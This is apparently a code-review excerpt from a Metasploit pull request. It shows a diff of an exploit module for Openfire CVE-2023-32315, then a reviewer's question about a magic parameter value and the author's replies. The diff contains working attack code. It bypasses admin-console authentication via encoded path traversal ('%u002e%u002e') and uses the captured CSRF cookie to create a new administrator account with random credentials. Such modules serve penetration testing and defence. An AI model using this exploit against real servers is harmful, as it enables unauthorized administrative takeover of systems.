modules/exploits/multi/http/openfire_auth_bypass_rce_cve_2023_32315.rb

```diff
@@ -0,0 +1,275 @@
+        'DefaultOptions' => {
+          'SSL' => false,
+          'RPORT' => 9090
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
+        OptString.new('PLUGINNAME', [ false, 'Openfire plugin base name, (default: random)' ]),
+        OptString.new('PLUGINAUTHOR', [ false, 'Openfire plugin author, (default: random)' ]),
+        OptString.new('PLUGINDESC', [ false, 'Openfire plugin description, (default: random)' ]),
+        OptString.new('ADMINNAME', [ false, 'Openfire admin user name, (default: random)' ]),
+      ]
+    )
+  end
+
+  def get_version
+    # get Openfire version number from the admin console login page
+    openfire = {}
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'login.jsp'),
+      'ctype' => 'application/x-www-form-urlencoded'
+    })
+    if res && res.code == 200
+      version = res.body.match(/Openfire,\s*\D*:\s*\d\.\d{1,2}\.\d/)
+      openfire['version'] = version[0].split(':')[1].strip unless version.nil?
+    end
+    return openfire
+  end
+
+  def auth_bypass
+    # bypass authentication using path traversal vulnerability and return true if cookie_jar is filled (JSESSION-ID and CSRF) else return false.
+    send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-groups.jsp'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true
+    })
+    if cookie_jar.cookies.empty?
+      return false
+    else
+      cookie_jar.cookies.each do |cookie|
+        print_status(cookie.to_s)
+      end
+      return true
+    end
+  end
+
+  def add_admin_user
+    # add an admin user using path traversal vulnerability using the cookies retrieved from authentication bypass.
+    # returns admin login hash with random generated username and password
+    @admin_login = {}
+    username = datastore['ADMINNAME'] || Rex::Text.rand_text_alpha_lower(8..15)
+    password = Rex::Text.rand_password(8..10)
+    cookie_jar.cookies.each do |cookie|
+      @csrf_token = cookie.to_s.split('=')[1].strip unless cookie.to_s.match(/csrf=/).nil?
+    end
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'setup', 'setup-s', '%u002e%u002e/%u002e%u002e/user-create.jsp'),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'keep_cookies' => true,
+      'vars_get' => {
+        'csrf' => @csrf_token.to_s,
+        'username' => username.to_s,
+        'password' => password.to_s,
+        'passwordConfirm' => password.to_s,
+        'isadmin' => 'on',
+        'create' => '\xe5\x88\x9b\xe5\xbb\xba\xe7\x94\xa8\xe6\x88\xb7'
```

Comment:
What is this magic value?

Reply:
Made it more human readable `create=Create+User`

Reply:
See https://github.com/rapid7/metasploit-framework/pull/18173/commits/c34779a5f156a7f03892626ea35ed338dbeced51.